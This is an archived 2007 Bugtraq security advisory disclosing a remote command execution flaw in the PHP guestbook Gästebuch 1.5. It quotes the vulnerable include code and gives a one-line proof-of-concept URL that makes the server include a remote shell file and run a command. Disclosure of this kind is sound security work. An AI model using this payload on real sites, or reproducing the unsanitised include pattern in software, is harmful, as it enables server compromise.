lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 9 Aug 2007 16:16:38 -0000
From: rizgar@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: Gstebuch Version 1.5 Remote Command Execution Vulnerability

Gästebuch Version 1.5 Remote Command Execution Vulnerability 
-----------------------------------------------------------------------


Script  : Gästebuch Version 

Version : 1.5
	
Site    : http://www.mapos-scripts.de/downloads.php?download=11

Founder : Rizgar

Contact : rizgar@...uxmail.org and irc.gigachat.net #kurdhack 

Thanks  : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]

-----------------------------------------------------------------------



<?php
session_start();
include($config["root_ordner"].'config.php');
if (file_exists($root_ordner.'install.php')) 
{
	echo "<meta http-equiv='refresh' content='0;URL=install.php'>";
	exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
include($config["root_ordner"].'includes/captcha.php');
$header = style('index_body','header');
echo $header;

...

?>

PoC : 

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ